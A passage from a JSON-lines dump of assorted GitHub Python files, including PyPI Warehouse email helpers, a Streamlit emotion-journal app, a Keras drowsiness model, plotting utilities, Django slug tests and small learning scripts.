submitter_name, submitter_role, recipient_role\n):\n recipient_role_descr = \"an owner\"\n if recipient_role == \"Maintainer\":\n recipient_role_descr = \"a maintainer\"\n\n return {\n \"project_name\": release.project.name,\n \"release_version\": release.version,\n \"release_date\": release.created.strftime(\"%Y-%m-%d\"),\n \"submitter_name\": submitter_name,\n \"submitter_role\": submitter_role.lower(),\n \"recipient_role_descr\": recipient_role_descr,\n }\n\n\n@_email(\"removed-project-release-file\")\ndef send_removed_project_release_file_email(\n request, user, *, file, release, submitter_name, submitter_role, recipient_role\n):\n recipient_role_descr = \"an owner\"\n if recipient_role == \"Maintainer\":\n recipient_role_descr = \"a maintainer\"\n\n return {\n \"file\": file,\n \"project_name\": release.project.name,\n \"release_version\": release.version,\n \"submitter_name\": submitter_name,\n \"submitter_role\": submitter_role.lower(),\n \"recipient_role_descr\": recipient_role_descr,\n }\n\n\n@_email(\"recovery-codes-generated\")\ndef send_recovery_codes_generated_email(request, user):\n return {\"username\": user.username}\n\n\n@_email(\"recovery-code-used\")\ndef send_recovery_code_used_email(request, user):\n return {\"username\": user.username}\n\n\n@_email(\"recovery-code-reminder\")\ndef send_recovery_code_reminder_email(request, user):\n return {\"username\": user.username}\n\n\n@_email(\"trusted-publisher-added\")\ndef send_trusted_publisher_added_email(request, user, project_name, publisher):\n # We use the request's user, since they're the one triggering the action.\n return {\n \"username\": request.user.username,\n \"project_name\": project_name,\n \"publisher\": publisher,\n }\n\n\n@_email(\"trusted-publisher-removed\")\ndef send_trusted_publisher_removed_email(request, user, project_name, publisher):\n # We use the request's user, since they're the one triggering the action.\n return {\n \"username\": request.user.username,\n \"project_name\": project_name,\n \"publisher\": publisher,\n }\n\n\n@_email(\"pending-trusted-publisher-invalidated\")\ndef send_pending_trusted_publisher_invalidated_email(request, user, project_name):\n return {\n \"project_name\": project_name,\n }\n\n\ndef includeme(config):\n email_sending_class = config.maybe_dotted(config.registry.settings[\"mail.backend\"])\n config.register_service_factory(email_sending_class.create_service, IEmailSender)\n\n # Add a periodic task to cleanup our EmailMessage table. We're going to\n # do this cleanup, regardless of if we're configured to use SES to send\n # or not, because even if we stop using SES, we'll want to remove any\n # emails that had been sent, and the cost of doing this is very low.\n config.add_periodic_task(crontab(minute=0, hour=0), ses_cleanup)\n","repo_name":"pypi/warehouse","sub_path":"warehouse/email/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":29759,"program_lang":"python","lang":"en","doc_type":"code","stars":3382,"dataset":"github-code","pt":"3"} +{"seq_id":"2287576568","text":"#https://programmers.co.kr/learn/courses/30/lessons/83201\nimport sys\ndef solution(scores):\n answer = ''\n N=len(scores[0])\n for i in range(N):\n temp=[]\n mine=0\n for j in range(N):\n if i==j:\n mine=scores[j][i]\n temp.append(scores[j][i])\n temp.sort()\n if mine==max(temp) and temp[N-1]!=temp[N-2]:\n temp.remove(mine)\n elif mine==min(temp) and temp[0]!=temp[1]:\n temp.remove(mine)\n avg=sum(temp)/len(temp)\n if avg>=90:\n answer+='A'\n elif avg>=80:\n answer+='B'\n elif avg>=70:\n answer+='C'\n elif avg>=50:\n answer+='D'\n else:\n answer+='F'\n return answer","repo_name":"Myunwoo/algorithm_study","sub_path":"sort/programmers83201.py","file_name":"programmers83201.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25984854495","text":"import numpy as np\r\nimport pandas as pd\r\nimport csv\r\nfrom PIL import Image\r\n\r\nfrom datetime import datetime\r\nfrom datetime import date\r\n\r\nimport streamlit as st\r\n\r\nimport tensorflow as tf\r\n\r\nfrom tensorflow.keras.preprocessing.text import Tokenizer\r\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\r\n\r\nfrom tensorflow.keras.models import load_model\r\n\r\ntrain_data = pd.read_csv(\"tweet_emotions.csv\")\r\ntrain_data.head()\r\n\r\ntraining_sentences = []\r\n\r\nfor i in range(len(train_data)):\r\n sentence = train_data.loc[i, \"content\"]\r\n training_sentences.append(sentence)\r\n\r\n\r\nmodel = load_model(\"Tweets_Text_Emotion.h5\")\r\n\r\nvocab_size = 40000\r\nmax_length = 100\r\ntrunc_type = \"post\"\r\npadding_type = \"post\"\r\noov_tok = \"\"\r\n\r\n\r\ntokenizer = Tokenizer(num_words=vocab_size, oov_token=oov_tok)\r\ntokenizer.fit_on_texts(training_sentences)\r\n\r\n\r\n################################################################################################################\r\ndate_time = date.today().strftime(\"%A %d %B %Y\")\r\n\r\nemo_code_url = {\r\n \"empty\": [0, \"./emoticons/Empty.png\"],\r\n \"sadness\": [1, \"./emoticons/Sadness.png\"],\r\n \"enthusiasm\": [2, \"./emoticons/Enthusiasm.png\"],\r\n \"neutral\": [3, \"./emoticons/Neutral.png\"],\r\n \"worry\": [4, \"./emoticons/Worry.png\"],\r\n \"surprise\": [5, \"./emoticons/Surprise.png\"],\r\n \"love\": [6, \"./emoticons/Love.png\"],\r\n \"fun\": [7, \"./emoticons/Fun.png\"],\r\n \"hate\": [8, \"./emoticons/Hate.png\"],\r\n \"happiness\": [9, \"./emoticons/Happiness.png\"],\r\n \"boredom\": [10, \"./emoticons/Boredom.png\"],\r\n \"relief\": [11, \"./emoticons/Relief.png\"],\r\n \"anger\": [12, \"./emoticons/Anger.png\"],\r\n}\r\n\r\n\r\ndef save(text, emotion):\r\n with open(\"data_entry.csv\", \"a\") as f:\r\n f.write(\"%s,%s,%s\\n\" % (date_time, text, emotion))\r\n\r\n\r\ndef app_headers():\r\n # Title\r\n st.title(\"Digital Journal\")\r\n # Day and Date\r\n st.write(date_time)\r\n\r\n\r\ndef new_entry():\r\n # New Entry\r\n input = st.empty()\r\n text = str(input.text_input(\"How was your day?\"))\r\n\r\n if text != \"\":\r\n sentence = []\r\n sentence.append(text)\r\n print(sentence)\r\n\r\n sequences = tokenizer.texts_to_sequences(sentence)\r\n print(\"sequence\", sequences)\r\n\r\n padded = pad_sequences(\r\n sequences, maxlen=max_length, padding=padding_type, truncating=trunc_type\r\n )\r\n testing_padded = np.array(padded)\r\n\r\n predicted_class_label = np.argmax(model.predict(testing_padded), axis=-1)\r\n print(predicted_class_label)\r\n emotion = \"\"\r\n emoticon = \"\"\r\n col1, col2, col3 = st.columns(3)\r\n for key, value in emo_code_url.items():\r\n if value[0] == predicted_class_label:\r\n emotion = key\r\n emoticon = value[1]\r\n with col1:\r\n st.write(key.upper())\r\n with col2:\r\n image = Image.open(emoticon)\r\n st.image(image, width=60)\r\n \r\n with col3:\r\n if st.button(\"Save Entry\"): \r\n save(text, emotion)\r\n # text = input.text_input(\"\") \r\n \r\n \r\n\r\n\r\ndef display_entries():\r\n\r\n st.header(\"Your Entries!\")\r\n\r\n day_entry_list = pd.read_csv(\"data_entry.csv\")\r\n day_entry_list[\"date\"] = pd.to_datetime(day_entry_list[\"date\"])\r\n day_entry_list = day_entry_list.sort_values(\r\n by=\"date\", ascending=False, ignore_index=True\r\n )\r\n\r\n # st.write(day_entry_list)\r\n\r\n col1, col2, col3 = st.columns(3)\r\n\r\n for i in range(len(day_entry_list)):\r\n\r\n if i < 3:\r\n\r\n date = day_entry_list.loc[i, \"date\"]\r\n text = day_entry_list.loc[i, \"text\"]\r\n emotion = day_entry_list.loc[i, \"emotion\"]\r\n image = \"\"\r\n\r\n for key, value in emo_code_url.items():\r\n \r\n if emotion == key:\r\n print(value[1])\r\n image = Image.open(value[1])\r\n\r\n if i + 1 == 1:\r\n with col1:\r\n st.subheader(date.strftime(\"%A, %d %B %Y\"))\r\n st.write(text)\r\n st.write(emotion.upper())\r\n st.image(image, width=60)\r\n if i + 1 == 2:\r\n with col2:\r\n st.subheader(date.strftime(\"%A, %d %B %Y\"))\r\n st.write(text)\r\n st.write(emotion.upper())\r\n st.image(image, width=60)\r\n if i + 1 == 3:\r\n with col3: \r\n st.subheader(date.strftime(\"%A, %d %B %Y\"))\r\n st.write(text)\r\n st.write(emotion.upper())\r\n st.image(image, width=60)\r\n\r\n\r\n## Calling methods......\r\n\r\napp_headers()\r\nnew_entry()\r\ndisplay_entries()\r\n","repo_name":"PreetiSharma15/Test-Deployment-Using-Streamlit","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13313975503","text":"import os\nimport numpy as np\nimport cv2\nimport keras\nimport matplotlib.pyplot as plt\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation, Dropout, Conv2D, MaxPooling2D, Flatten, TimeDistributed, LSTM\nfrom keras.optimizers import SGD\n\ntraining_data_dir = os.getcwd() + '/faces-training'\nvalidation_data_dir = os.getcwd() + '/faces-validation'\n\n\ndef get_data(source_dir):\n image_files = []\n idx = 0\n for root, dirs, files in os.walk(source_dir, topdown=False):\n if len(files) == 0:\n continue\n\n image_files.append([])\n for name in files:\n image_files[idx].append(os.path.join(root, name))\n idx = idx + 1\n\n image_data_by_candidates = []\n image_label_by_candidates = []\n\n for x in range(0, len(image_files)):\n image_data = []\n image_label = []\n for image in image_files[x]:\n im = cv2.imread(image, cv2.IMREAD_GRAYSCALE)\n \n if im is None:\n continue\n\n im = im/255\n data = np.array(im)\n label = get_label(image)\n\n image_data.append(data)\n image_label.append(label)\n\n image_data_by_candidates.append(np.array(image_data))\n image_label_by_candidates.append(np.array(image_label))\n\n return np.array(image_data), image_label\n\n\ndef get_label(image_file_name):\n length = len(image_file_name)\n base = image_file_name[length - 6:length]\n\n if base == '_0.jpg':\n return 0\n if base == '_5.jpg':\n return 1\n if base == '10.jpg':\n return 2\n\n print('Oops something went wrong!')\n exit(-1)\n\n\nbatch_size = 128\nepochs = 20\n\ninput_shape = (360, 360)\nnum_classes = 3\n\ntraining_data, training_target = get_data(training_data_dir)\nvalidation_data, validation_target = get_data(validation_data_dir)\n\n\n\nmodel = Sequential()\nmodel.add(TimeDistributed(Conv2D(32, (3, 3), activation='relu', \n #data_format=\"channels_last\", \n input_shape=input_shape)))\nmodel.add(TimeDistributed(MaxPooling2D((2, 2))))\nmodel.add(TimeDistributed(Conv2D(32, (3, 3), activation='relu')))\nmodel.add(TimeDistributed(MaxPooling2D((2, 2))))\nmodel.add(TimeDistributed(Conv2D(32, (3, 3), activation='relu')))\nmodel.add(TimeDistributed(Flatten()))\nmodel.add(LSTM(32))\nmodel.add(Dense(3, activation='softmax'))\n\nmodel.compile(loss=keras.losses.SparseCategoricalCrossentropy(),\n optimizer='adam',\n metrics=['accuracy'])\n\n\nhistory = model.fit(training_data, training_target, batch_size=batch_size,\n epochs=epochs, verbose=1, validation_data=(validation_data, validation_target))\nmodel.summary()\n\n\ndef plot_train(hist):\n h = hist.history\n if 'accuracy' in h:\n meas = 'accuracy'\n loc = 'lower right'\n else:\n meas = 'loss'\n loc = 'upper right'\n plt.plot(hist.history[meas])\n plt.plot(hist.history['val_'+meas])\n plt.title('model '+meas)\n plt.ylabel(meas)\n plt.xlabel('epoch')\n plt.legend(['train', 'validation'], loc=loc)\n\nplot_train(history)","repo_name":"limhawjia/driver-drowsiness-detection","sub_path":"models/lstmcnn.py","file_name":"lstmcnn.py","file_ext":"py","file_size_in_byte":3084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8803125103","text":"from __future__ import print_function, absolute_import\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom .graphics import (corner_setup, fix_diagonal_axes, key2label,\n add_inner_title, square_aspect)\n\n\ndef add_quantiles(SSP, ax, attrs, uvalss=None, probs=None,\n twod=False, gauss=False, interpolate=True):\n \"\"\"\n Add some lines!\n\n Parameters\n ----------\n SSP : ssp.SSP instance\n ax : plt.axes instance\n add lines/points to this plot\n attrs: 1 or 2D str array\n (marginalized) SSP.data columns to plot\n NB: attrs must go [xattr, yattr] for 2d plotting\n uvalls: 1 or 2D float array\n unique values of attrs\n probs: 1 or 2D float array\n marginalized probabilities corresponding to attrs\n twod:\n add lines\n gauss: bool (False)\n fit or access gaussian fit of the attribute(s) and add lines\n for the mean and +/- stdev / 2\n or (default)\n add 16 and 84 percentile as well as maximum posterior probability.\n if twod, the mean or max post. prob will be plotted as point.\n\n Returns\n -------\n ax : plt.axes instance\n (may add attributes to SSP if quantiles or fittgauss1D had not been called)\n \"\"\"\n attrs = np.atleast_1d(attrs)\n if uvalss is None:\n uvalss = [None] * len(attrs)\n else:\n uvalss = np.atleast_1d(uvalss)\n\n if probs is None:\n probs = [None] * len(attrs)\n else:\n probs = np.atleast_1d(probs)\n\n pltkw = {'color': 'k'}\n # why order matteres: xattr yattr will plot vline and hline\n linefuncs = [ax.axvline, ax.axhline]\n # mean or max post. prob to plot as points\n pts = []\n for i, (attr, uvals, prob) in enumerate(zip(attrs, uvalss, probs)):\n if attr is None:\n # for second loop 1D\n continue\n # look up value\n qatr = '{:s}q'.format(attr)\n if hasattr(SSP, qatr):\n q = SSP.__getattribute__(qatr)\n else:\n if gauss:\n # fit 1D Gaussian\n SSP.fitgauss1D(attr, uvals, prob)\n # go with quantiles (default 0.16, 0.84)\n # g = SSP.quantiles(attr, uvals, prob, maxp=True, k=1, ax=ax)\n q = SSP.quantiles(attr, uvals, prob, maxp=True, k=1,\n interpolate=interpolate)\n\n try:\n lines = [g.mean, g.mean + g.stddev / 2, g.mean - g.stddev / 2]\n except:\n # if maxp=False when SSP.quantiles called\n # this will raise a value error because g will be length 2.\n lines = [q[2], q[0], q[1]]\n lstys = ['-', '--', '--']\n\n if twod:\n if gauss:\n lines = [g.mean + g.stddev / 2, g.mean - g.stddev / 2]\n pts.append(g.mean)\n else:\n lines = [q[0], q[1]]\n pts.append(q[2])\n lstys = ['--', '--']\n\n # plot.\n [linefuncs[i](l, ls=ls, **pltkw) for (l, ls) in zip(lines, lstys)]\n\n if twod:\n # plot mean or max post prob\n ax.plot(pts[0], pts[1], 'o', color='white', mec='k', mew=1)\n\n return ax\n\n\ndef pdf_plot(SSP, xattr, yattr=None, ax=None, sub=None, save=False,\n truth=None, cmap=None, plt_kw=None, X=None, prob=None,\n logp=True, quantile=False, gauss1D=False, plotfit=False,\n interpolateq=True):\n \"\"\"Plot -2 ln P vs marginalized attributes\n\n SSP : SSP class instance\n\n xattr, yattr : str\n column names to marginalize and plot\n\n ax : plt.Axes\n add plot to this axis\n\n sub : str\n if save, add this string to the filename\n\n save : bool\n save the plot to file with axes lables.\n\n truth : dict\n truth dictionary with attributes as keys and truth values as values\n overplot as hline and vline on axes.\n\n cmap : cm.cmap instance\n if yattr isn't None, call plt.pcolor with this cmap.\n\n plt_kw : dict\n if yattr is None, pass these kwargs to plt.plot\n\n Returns\n ax : plt.Axes\n new or updated axes instance\n \"\"\"\n plt_kw = plt_kw or {}\n def_kw = {'lw': 4, 'color': 'k'}\n def_kw.update(plt_kw)\n plt_kw = def_kw\n\n cmap = cmap or plt.cm.viridis_r\n\n sub = sub or ''\n truth = truth or {}\n do_cbar = False\n pstr = ''\n\n if logp:\n pstr = '\\ln\\ '\n\n if ax is None:\n _, ax = plt.subplots()\n if yattr is not None:\n do_cbar = True\n\n if yattr is None:\n # plot type is marginal probability. Attribute vs -2 ln P\n if X is None and prob is None:\n if not SSP.vdict[xattr]:\n return ax\n X, prob = SSP.marginalize(xattr, log=logp)\n SSP.build_posterior(xattr, X, prob)\n\n if gauss1D:\n gx = SSP.fitgauss1D(xattr, X, prob)\n\n l = ax.plot(X, prob, **plt_kw)\n\n if quantile:\n ax = add_quantiles(SSP, ax, xattr, uvalss=[X], probs=[prob],\n gauss=gauss1D, interpolate=interpolateq)\n\n ax.set_xlim(X.min(), X.max())\n # yaxis max is the larger of 10% higher than the max val or current ylim.\n ymax = np.max([prob.max() + (prob.max() * 0.1), ax.get_ylim()[1]])\n ax.set_ylim(prob.min(), ymax)\n\n if gauss1D and plotfit:\n # over plot Gaussian fit\n # plot the Gaussian 10 steps beyond the calculated limits.\n dx = 10 * np.diff(X)[0]\n xx = np.linspace(X.min() - dx, X.max() + dx, 100)\n ax.plot(xx, gx(xx), color='darkred')\n\n if save:\n ptype = 'marginal'\n # ax.set_ylabel(key2label('fit'))\n ax.set_ylabel(key2label(pstr+'Probability'))\n else:\n\n # plot type is joint probability.\n # Attribute1 vs Attribute2 colored by fit\n if not SSP.vdict[xattr] or not SSP.vdict[yattr]:\n return ax\n\n [X, Y], prob = SSP.marginalize(xattr, yattr=yattr, log=logp)\n\n if gauss1D:\n gy = SSP.fitgauss1D(yattr, Y, prob)\n\n l = ax.pcolor(X, Y, prob, cmap=cmap)\n # use imshow instead of pcolor, has strange aspect ratio...\n # ux = SSP.__getattribute__('u{0:s}'.format(xattr))\n # uy = SSP.__getattribute__('u{0:s}'.format(yattr))\n # l = ax.imshow(prob.T, extent=[ux[0], ux[-1], uy[0], uy[-1]], cmap=cmap,\n # origin='lower')\n # ax = square_aspect(ax)\n\n if quantile:\n add_quantiles(SSP, ax, [xattr, yattr], twod=True, gauss=gauss1D,\n interpolate=interpolateq)\n\n ax.set_xlim(X.min(), X.max())\n ax.set_ylim(Y.min(), Y.max())\n\n if do_cbar:\n cbar = plt.colorbar(l)\n # cbar.set_label(key2label('fit'))\n cbar.set_label(key2label(pstr+'Probability'))\n\n if save:\n ptype = '{}_joint'.format(yattr)\n ax.set_ylabel(key2label(yattr, gyr=SSP.gyr))\n\n if yattr in truth:\n ax.axhline(truth[yattr], color='darkred', lw=3, zorder=0)\n\n if xattr in truth:\n ax.axvline(truth[xattr], color='darkred', lw=3, zorder=0)\n\n if save:\n ax.set_xlabel(key2label(xattr, gyr=SSP.gyr))\n # add subdirectory to filename\n if len(sub) > 0:\n sub = '_' + sub\n outfmt = '{}_{}{}_{}{}'\n outname = outfmt.format(SSP.name.replace('.csv', ''),\n xattr, sub, ptype, EXT)\n plt.savefig(outname, bbox_inches='tight')\n print('wrote {}'.format(outname))\n plt.close()\n return ax\n\n\ndef pdf_plots(SSP, marginals=None, sub=None, twod=False, truth=None,\n text=None, cmap=None, fig=None, axs=None, frompost=False,\n logp=True, gauss1D=False, quantile=True, interpolateq=True):\n \"\"\"Call pdf_plot for a list of xattr and yattr\"\"\"\n text = text or ''\n sub = sub or ''\n truth = truth or {}\n marginals = marginals or SSP._getmarginals()\n pstr = ''\n plkw = {'logp': logp, 'gauss1D': gauss1D, 'quantile': quantile,\n 'interpolateq': interpolateq}\n\n if logp:\n pstr = '\\ln\\ '\n\n if not hasattr(SSP, 'vdict'):\n SSP.check_grid()\n valid_margs = [k for (k, v) in list(SSP.vdict.items()) if v]\n ndim = len(marginals)\n if ndim != len(valid_margs):\n bad_margs = [m for m in marginals if m not in valid_margs]\n marginals = [m for m in marginals if m in valid_margs]\n print('Warning: {} does not vary and will be skipped.'.format(bad_margs))\n ndim = len(marginals)\n\n raxs = []\n if twod:\n fig, axs = corner_setup(ndim)\n for c, mx in enumerate(marginals):\n for r, my in enumerate(marginals):\n ax = axs[r, c]\n if r == c:\n # diagonal\n # my = 'fit' # my is reset for ylabel call\n my = pstr+'Probability'\n raxs.append(SSP.pdf_plot(mx, ax=ax, truth=truth, **plkw))\n else:\n # off-diagonal\n raxs.append(SSP.pdf_plot(mx, yattr=my, ax=ax, truth=truth,\n cmap=cmap, **plkw))\n\n if c == 0:\n # left most column\n ax.set_ylabel(key2label(my, gyr=SSP.gyr))\n\n if r == ndim - 1:\n # bottom row\n ax.set_xlabel(key2label(mx, gyr=SSP.gyr))\n [ax.locator_params(axis='y', nbins=6) for ax in axs.ravel()]\n fix_diagonal_axes(raxs, ndim)\n else:\n if fig is None and axs is None:\n fig, axs = plt.subplots(ncols=ndim, figsize=(ndim * 3., ndim * 0.6))\n [ax.tick_params(left='off', labelleft='off', right='off', top='off')\n for ax in axs]\n X = None\n prob = None\n for i in marginals:\n if frompost:\n pattr = '{:s}prob'.format(i)\n X = SSP.data[i][np.isfinite(SSP.data[i])]\n prob = SSP.data[pattr][np.isfinite(SSP.data[pattr])]\n ax = axs[marginals.index(i)]\n ax = SSP.pdf_plot(i, truth=truth, ax=ax, X=X, prob=prob, **plkw)\n ax.set_xlabel(key2label(i, gyr=SSP.gyr))\n raxs.append(ax)\n\n if text:\n add_inner_title(raxs[-1], '${}$'.format(text), 3, size=None)\n fig.subplots_adjust(bottom=0.22, left=0.05)\n raxs[0].set_ylabel(key2label('Probability'))\n [ax.locator_params(axis='x', nbins=5) for ax in axs.ravel()]\n return fig, raxs\n","repo_name":"philrosenfield/match","sub_path":"scripts/graphics/pdfs.py","file_name":"pdfs.py","file_ext":"py","file_size_in_byte":10500,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"29029313187","text":"import pytest\nimport pretend\n\nfrom common import factories\nfrom rest_framework.reverse import reverse\nfrom plan.services.api.slug import SCHEDULE_SLUG_TYPE\n\npytestmark = pytest.mark.django_db\n\n\ndef get_slug(client, name, **params):\n data = {'name': name}\n data.update(**params)\n response = client.json.get(\n reverse('api-frontend:service-make-slug-list'),\n data\n )\n\n assert response.status_code == 200\n return response.json()['slug']\n\n\ndef validate_slug(client, slug, **params):\n data = {'slug': slug}\n data.update(params)\n response = client.json.get(\n reverse('api-frontend:service-validate-slug-list'),\n data,\n )\n\n assert response.status_code == 200\n result = response.json()\n return result['valid'], result['alternative']\n\n\ndef validate_invalid_slug(client, slug, message, **params):\n data = {'slug': slug}\n data.update(params)\n response = client.json.get(\n reverse('api-frontend:service-validate-slug-list'),\n data,\n )\n\n assert response.status_code == 400\n expected = {\n 'error': {\n 'detail': 'Sent data is wrong.',\n 'code': 'bad_request',\n 'message': message\n }\n }\n assert response.json() == expected\n\n\n@pytest.fixture\ndef cities():\n factories.ServiceFactory(slug='moscow_2')\n factories.ServiceFactory(slug='moscow33')\n factories.ServiceFactory(slug='spb11')\n factories.ServiceFactory(slug=('a' * 50))\n\n return pretend.stub(\n moscow=factories.ServiceFactory(slug='moscow'),\n moscow1=factories.ServiceFactory(slug='moscow1'),\n spb=factories.ServiceFactory(slug='spb'),\n )\n\n\n@pytest.fixture\ndef schedules(cities):\n factories.ScheduleFactory(service=cities.moscow, slug='moscow_duty')\n factories.ScheduleFactory(service=cities.moscow, slug='moscow_duty1')\n factories.ScheduleFactory(service=cities.spb, slug='duty')\n factories.ScheduleFactory(service=cities.spb, slug='duty2')\n\n\ndef test_make_slug(client, cities):\n assert get_slug(client, 'Moscow') == 'moscow2'\n assert get_slug(client, 'Moscow 2') == 'moscow_21'\n assert get_slug(client, 'Moscow 3') == 'moscow_3'\n assert get_slug(client, 'Moscoww') == 'moscoww'\n assert get_slug(client, 'SPB') == 'spb1'\n assert get_slug(client, ('a' * 50)) == ('a' * 49) + '1'\n assert get_slug(client, 'Perm') == 'perm'\n\n\ndef test_make_schedule_slug(client, cities, schedules):\n assert get_slug(\n client, 'Moscow',\n type=SCHEDULE_SLUG_TYPE,\n service=cities.moscow.id\n ) == 'moscow_moscow'\n\n assert get_slug(\n client, 'duty',\n type=SCHEDULE_SLUG_TYPE,\n service=cities.moscow.id\n ) == 'moscow_duty2'\n\n assert get_slug(\n client, 'moscow_duty_SMTH',\n type=SCHEDULE_SLUG_TYPE,\n service=cities.moscow.id\n ) == 'moscow_duty_smth'\n\n\ndef test_validate_slug(client, cities):\n assert validate_slug(client, 'moscow') == (False, 'moscow2')\n assert validate_slug(client, 'spb') == (False, 'spb1')\n assert validate_slug(client, 'spb1') == (True, None)\n assert validate_slug(client, ('a' * 25)) == (True, None)\n assert validate_slug(client, 'ufa') == (True, None)\n\n factories.RoleScopeFactory(slug='testing')\n assert validate_slug(client, 'moscow_testing') == (False, 'moscow_testing1')\n\n\ndef test_validate_duty_slug(client, schedules, cities):\n assert validate_slug(\n client, 'moscow_duty',\n type=SCHEDULE_SLUG_TYPE,\n service=cities.moscow.id\n ) == (False, 'moscow_duty2')\n\n assert validate_slug(\n client, 'moscow_duty',\n type=SCHEDULE_SLUG_TYPE,\n service=cities.spb.id\n ) == (False, 'spb_moscow_duty')\n\n assert validate_slug(\n client, 'duty',\n type=SCHEDULE_SLUG_TYPE,\n service=cities.moscow.id\n ) == (False, 'moscow_duty2')\n\n assert validate_slug(\n client, 'moscow_duty3',\n type=SCHEDULE_SLUG_TYPE,\n service=cities.moscow.id\n ) == (True, None)\n\n assert validate_slug(\n client, 'spb_duty',\n type=SCHEDULE_SLUG_TYPE,\n service=cities.spb.id\n ) == (True, None)\n\n assert validate_slug(\n client, 'spb_duty4',\n type=SCHEDULE_SLUG_TYPE,\n service=cities.spb.id\n ) == (True, None)\n\n assert validate_slug(\n client, 'duty',\n type=SCHEDULE_SLUG_TYPE,\n service=cities.spb.id\n ) == (False, 'spb_duty')\n\n\ndef test_make_slug_frontend_api(client):\n response = client.json.get(\n reverse('services:service_make_slug'),\n {'name': 'test_me'}\n )\n\n assert response.status_code == 200\n assert response.json()['content']['slug'] == 'test_me'\n\n\ndef test_validate_invalid_slug(client):\n match_message = {\n 'ru': 'Неверный слаг. '\n 'Слаг должен состоять из латинских букв в нижнем регистре, цифр, знаков подчеркивания или дефиса.',\n 'en': 'Slug is invalid. '\n 'Slug should contain only lower alphanumeric, underscore and hyphen characters.',\n }\n length_message = {\n 'ru': 'Неверный слаг. '\n 'Длина слага должна быть не более 50 символов.',\n 'en': 'Slug is invalid. '\n 'Slug length should not exceed 50 characters.',\n }\n digit_message = {\n 'ru': 'Неверный слаг. '\n 'Слаг не может состоять из одних цифр.',\n 'en': 'Slug is invalid. '\n 'Slug can\\'t contain only digits.',\n }\n\n validate_invalid_slug(client, 'Moscow City', match_message)\n validate_invalid_slug(client, 'moskva*1', match_message)\n validate_invalid_slug(client, 'a' * 60, length_message)\n validate_invalid_slug(client, 'Москва', match_message)\n validate_invalid_slug(client, '111', digit_message)\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"Intranet/tests/unit/services/api/test_slug.py","file_name":"test_slug.py","file_ext":"py","file_size_in_byte":5936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28980018","text":"import unittest\n\nfrom simulation import Household, FoodItem, FoodType, StandardMealGenerator\n\n\nclass TestHousehold(unittest.TestCase):\n\n def setUp(self):\n self.household = Household(adults=2, children=1, income_percentile=0.6)\n self.household.meal_generator = StandardMealGenerator(1.0)\n\n # Adding some items to pantry\n self.bread = FoodItem(\"Bread\", FoodType.PERISHABLE, best_before=3, spoilage_date=5, quantity=0.5)\n self.cookies = FoodItem(\"Cookies\", FoodType.NON_PERISHABLE, best_before=15, spoilage_date=20, quantity=0.3)\n self.leftover_pizza = FoodItem(\"Pizza\", FoodType.LEFTOVER, best_before=2, spoilage_date=3, quantity=0.4)\n\n self.household.pantry.add_item(self.bread)\n self.household.pantry.add_item(self.cookies)\n self.household.pantry.add_item(self.leftover_pizza)\n\n def test_start_of_week(self):\n \"\"\"Test the start_of_week method.\"\"\"\n self.household.start_of_week()\n self.assertIsNotNone(self.household.weekly_meals) # Ensures weekly meals are generated\n self.assertEqual(len(self.household.weekly_meals), 7) # Ensure there are 7 days' worth of meals\n\n def test_daily_step(self):\n \"\"\"Test the daily_step method.\"\"\"\n self.household.start_of_week()\n\n # Mock pantry's initial state.\n initial_pantry_total = self.household.get_total_food()\n self.assertGreater(initial_pantry_total,0)\n self.household.daily_step()\n\n # One day's meals should be consumed.\n self.assertEqual(len(self.household.weekly_meals), 6)\n\n # Ensure pantry quantity has decreased due to consumption.\n self.assertTrue(self.household.get_total_food() < initial_pantry_total)\n ## there really shouldn't be enough to feed yourself...\n\n \n # Ensure that waste log is updated (assuming the Pantry's step method updates it daily).\n## self.assertIn(1, self.household.get_waste_log()) # Checking if day 1 exists in waste log\n\n def tearDown(self):\n del self.household\n\n\n","repo_name":"CarrKnight/pantryManager","sub_path":"tests/test_household.py","file_name":"test_household.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"24117445735","text":"import yaml\n\nimport jprops\nimport argparse\n\n\ndef main(filepath):\n props = jprops.getJavaProperties(open(filepath))\n yamlDict = dict()\n envProp = dict()\n for key, value in props.items():\n envProp[key] = value\n\n yamlDict['applicationProp'] = envProp\n print(yamlDict)\n yamlFile = open(\"sample.yaml\", \"w\")\n\n yaml.dump(yamlDict, yamlFile)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-f\", \"--file\", help=\"input file name with path\", required=True)\n args = parser.parse_args()\n return args\n\n\n# Using jprops to get properties from a java style property file\nif __name__ == '__main__':\n inputs = parse_args()\n main(inputs.file)\n","repo_name":"SriPalla/java-prop-python","sub_path":"java-prop-yaml-main.py","file_name":"java-prop-yaml-main.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12954688256","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\na=[\"apple\",\"mango\",\"banana\"]\n\n\n# In[4]:\n\n\nprint(a)\n\n\n# In[5]:\n\n\nz=[5,6,2,3,\"black\",\"red\",\"green\"]\nprint(z)\n\n\n# In[8]:\n\n\nfor i in z:\n print(i)\n\n\n# In[11]:\n\n\nz.insert(2,\"white\")\nprint(z)\n\n\n# In[21]:\n\n\nfor i in z:\n if i==\"red\":\n break\n print(i)\n\n\n# In[22]:\n\n\nz.remove(\"black\")\nprint(z)\n\n\n# In[24]:\n\n\nL2=[4.3,2.3,7.8,\"orange\"]\nz.extend(L2)\nprint(z)\n\n\n# In[41]:\n\n\nfor i in z:\n if i==\"white\":\n 